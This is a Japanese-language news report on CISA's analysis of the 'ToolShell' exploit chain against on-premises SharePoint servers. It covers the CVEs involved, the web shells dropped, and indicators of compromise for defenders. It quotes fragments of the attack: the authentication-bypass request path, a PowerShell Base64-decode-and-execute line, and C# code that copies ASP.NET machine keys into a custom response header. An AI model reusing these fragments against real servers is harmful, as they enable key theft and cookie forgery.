CISA が SharePoint “ToolShell” について警告:IOC と検出用のシグニチャを公開

CISA Warns of ‘ToolShell’ Exploits Chain Attacks SharePoint Servers – Discloses IOCs and detection signatures

2025/08/07 CyberSecurityNews — オンプレミスの Microsoft SharePoint サーバを標的とする、高度なエクスプロイト・チェーンに関する緊急分析を、米国の CISA が発表した。この、ToolShell と呼ばれる攻撃は、ネットワーク・スプーフィングの脆弱性 CVE-2025-49706 とリモートコード実行の脆弱性 CVE-2025-49704 を悪用し、不正アクセスを達成した後に、ステルス性の高い Web シェルを設置するというものだ。

初期侵入は、SharePoint の編集インターフェイスに対する細工されたリクエストから開始され、”/_layouts/15/ToolPane.aspx?DisplayMode=Edit” を呼び出すことで認証チェックが回避され、悪意の ASPX ペイロードが展開される。

CISA の分析によると、この攻撃者はシェル・アクセスを取得した後に、Base64 エンコードされた DLL ベースのマシン・キー抽出ツールを連鎖させ、ASP.NET コンフィグから暗号化された秘密情報を窃取するという。

こうして抽出されたキーは、カスタム HTTP ヘッダー X-TXT-NET として全レスポンスに挿入され、保護されている ViewState と Cookie のリモート復号を可能にする。なお、この固有ヘッダーおよび関連 DLL ハッシュは、すでに検出シグネチャに取り込まれているため、後続の感染を特定する際に有効である。

最終段階として展開される Web シェル info3.aspx は、対話型コマンド実行とファイル・アップロードに加えて、チャレンジ・レスポンス・ログインフォームによる認証情報の窃取を可能にするものだ。攻撃者は、以下のような Base64 文字列を介して、PowerShell コマンドを送信する。

$encoded = "JABiAGEAcwBlADYANABTAHQ..."
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($encoded)) | iex

このコードは、ペイロードをメモリ上でデコード/実行し、ディスク書き込みを回避するため、フォレンジック上の痕跡は最小化され、アンチ・ウイルスによる検出が回避されるため、永続性が実現されていく。

ToolShell の感染メカニズム

ToolShell が悪用するのは、SharePoint のカスタマイズ機能である。攻撃者は spinstall0.aspx に対して POST リクエストを送り、TEMPLATE\LAYOUTS ディレクトリへの info3.aspx の書き込みをサーバに行わせる。このデプロイメントが完了すると、info3.aspx は Base64 形式の DLL (bjcloiyq.dll) をデコードし、マシンキー・パラメータを取得する。

var section = (MachineKeySection)WebConfigurationManager.GetSection("system. Web/machineKey");
var headerValue = $"{section.ValidationKey}|{section.DecryptionKey}";
Response.Headers.Add("X-TXT-NET", headerValue);

このコードにより抽出された秘密情報は、有効な SharePoint Cookie を偽造するものであり、完全な認証回避のために悪用される。

また、この攻撃チェーンの持続性は、Command and Control 用の XOR ベースのペイロード復号化と、再エンコード機能を持つ追加の ASPX シェル (spinstallb.aspxspinstallp.aspx) を連鎖させることで確保される。

防御側にとって不可欠なことは、ASPX ファイル名/DLL の SHA-256 ハッシュ/X-TXT-NET ヘッダーなどの IOC の継続的な監視により、ToolShell によるステルス的な活動を早期に検知/阻止することだ。

Microsoft SharePoint サーバを狙う、ToolShell という高度な攻撃チェーンについて、CISA が警告を発しています。その原因は、ネットワーク・スプーフィング脆弱性 CVE-2025-49706 と、リモートコード実行脆弱性 CVE-2025-49704 を組み合わせた侵入経路にあると、この記事は指摘しています。ただし、新たな脆弱性 CVE-2025-53770/CVE-2025-53771 も関与しているはずです。よろしければ、ToolShell で検索も、ご参照ください。